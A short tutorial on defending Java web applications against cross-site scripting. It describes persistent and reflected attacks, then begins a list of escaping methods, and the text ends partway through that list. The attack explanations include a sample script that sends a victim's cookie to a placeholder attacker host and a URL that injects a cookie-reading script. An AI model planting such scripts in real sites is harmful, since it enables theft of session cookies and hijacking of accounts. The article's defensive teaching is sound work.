Make Your Java Web Applications Impervious to Cross-site Scripting
If you develop Java-based web applications, you can use a filter to intercept and modify the user's request and response. Specifically, you can use server-side filtering to prevent malicious coders from requesting parameters and cookies. This article explains how to create and implement a custom filter that can guard against the various types of cross-site scripting attacks.
Types of Cross-site Scripting
There are three types of cross-site scripting attacks:
In a persistent cross-site scripting attack, the server saves the attacker's script code and then displays it on user pages. For example, many sites offer comments sections where users post comments, which the sites stored in databases. Normally, a user is tracked by session ID cookie. An attacker can add a script to track user cookies using the comments section. For example, the following script tracks user's cookie details.
<script>document.location= 'http://www. attackerhost/crack.html?'+document.cookie</script>
In a non-persistent cross-site scripting attack, the attacker's script code is added by the user's query parameters or HTML form submissions. The server adds this script in the user request page and sends it back to the user without proper response validation. Here is an example of a script for getting user cookie details through a URL:
<html> < script > var pos=document.URL.indexOf("user=")+5; document.write(document.URL.substring(pos,document.URL.length)); </ script > </html>
This page will use the value from the "user" parameter in the following manner.
http://www. examplesite /welcome.html?user=siva
An attacker can abuse this by luring the client to click on a link like this:
http://www. examplesite /welcome.html?user=<script>alert(document.cookie)</script>
Client-Side Validation for Cross-Site Scripting
Use the following, fairly simple methods to eliminate cross-site scripting vulnerabilities.
- Escaping Escape all untrusted data using a method appropriate for the output content. Here are the different escaping schemes for validating untrusted characters:
- HTML numeric entity encoding
- CSS escaping
- URL encoding